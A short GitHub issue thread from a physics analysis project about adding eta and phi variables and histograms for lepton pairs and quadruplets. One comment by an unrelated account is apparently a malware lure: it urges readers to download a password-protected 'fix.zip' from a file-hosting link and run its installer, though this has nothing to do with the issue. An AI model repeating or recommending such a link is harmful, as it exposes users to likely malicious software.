### ISSUE TITLE
Add code for dilepton and quadruplet angles

### ISSUE THREAD

**Issue by rsamconn** [ujphys/4lMET_Ana#30]
First step is to figure out what variables are needed. Candidates are:

1. Opening angle between leptons in a pair
2. Opening angle between the vectors of two pairs
3. Phi/ eta of a pair (sum of phi/eta of each lepton? Or average?)
4. Phi/eta of the quadruplet (same questions as for a pair)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rsamconn** [comment]
For now, ignore leading/subleading, e/u and angles between pairs/ individual leptons.

Simply go for:
l1l2 eta + phi
l3l4 eta + phi
4l eta + phi

**Comment by rsamconn** [comment]
- [ ] Add histograms to .h file
- [ ] Add histogram checks (to .cxx file in initialize() section)
- [ ] Add new variables (to .cxx file between initialize() and execute() sections)
- [ ] Add lines to save variables for each event (to .cxx file, in execute() kinematics section)
- [ ] Fill histograms (in .cxx file, execute() bitmask section)
